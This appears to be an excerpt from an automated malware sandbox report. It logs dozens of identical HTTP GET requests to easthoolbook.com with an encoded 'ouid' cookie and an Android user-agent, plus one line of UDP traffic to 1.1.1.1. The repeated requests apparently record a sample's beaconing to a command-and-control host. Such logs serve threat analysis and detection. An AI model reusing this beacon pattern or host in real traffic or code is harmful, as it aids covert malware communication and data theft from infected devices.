            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
